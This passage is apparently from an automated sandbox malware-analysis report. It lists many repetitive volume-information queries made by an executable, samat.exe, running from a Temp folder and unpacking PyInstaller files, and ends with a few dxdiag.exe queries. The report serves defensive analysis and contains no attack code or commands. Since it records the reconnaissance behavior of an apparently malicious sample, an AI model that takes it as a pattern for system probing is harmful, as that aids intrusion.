Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\_ssl.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\jaraco\text\Lorem ipsum.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\jaraco\text\Lorem ipsum.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\pywin32_system32 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\pywin32_system32 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\pywin32_system32 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\pywin32_system32 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\pywin32_system32 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\pywin32_system32 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\pywin32_system32 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\win32 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\pywin32_system32 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer\md.cp313-win_amd64.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer\md__mypyc.cp313-win_amd64.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282 VolumeInformation Jump to behavior
Source: C:\Windows\System32\dxdiag.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0516~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\dxdiag.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0110~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
